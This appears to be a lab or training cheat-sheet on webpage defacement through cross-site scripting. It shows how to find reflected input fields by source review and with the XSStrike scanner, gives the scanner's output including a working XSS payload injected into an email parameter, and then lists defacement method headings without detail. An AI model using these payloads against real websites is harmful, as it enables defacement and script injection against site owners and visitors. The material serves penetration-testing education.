WEBPAGE DEFACEMENT
IDENTIFY XSS VULNERABLE INPUT FIELDS
#perform code review
root@oco:~$ BROWSER > {targetSite:port} > CTRL + U
* review the HTML source and identify parameters
* also review the .js file
#verify by entering data in the form fields
root@oco:~$ BROWSER > {targetSite:port} > F12
input fields: fill in data
* copy the full URL to identify GET request parameters
- http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com
- fullname, username, password, email
#perform automated discovery
root@oco:~$ ./xsstrike.py -u "http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=email%40null.com"
XSStrike v3.1.5
[~] Checking for DOM vulnerabilities
[+] WAF Status: Offline
[!] Testing parameter: fullname
[-] No reflection found
[!] Testing parameter: username
[-] No reflection found
[!] Testing parameter: password
[-] No reflection found
[!] Testing parameter: email
[!] Reflections found: 1
[~] Analysing reflections
[~] Generating payloads
[!] Payloads generated: 3072
------------------------------------------------------------
[+] Payload: <hTML%0donpoiNtEreNtER+=+(prompt)``//
[!] Efficiency: 100
[!] Confidence: 10
[?] Would you like to continue scanning? [y/N]
#manually verify the identified parameter
root@oco:~$ BROWSER > http://94.237.60.32:30702/index.php?fullname=bughunter&username=bugger&password=password&email=<hTML%0donpoiNtEreNtER+=+(prompt)``//
* a prompt will be displayedMETHODS
CHANGING WEBPAGE BACKGROUND COLOR
SETTING AN IMAGE TO THE BACKGROUND
SETTING PAGE TITLE
CHANGING PAGE TEXT
CHANGING THE ENTIRE HTML CODE OF THE MAIN BODY
FULL IMPLEMENTATION
Last updated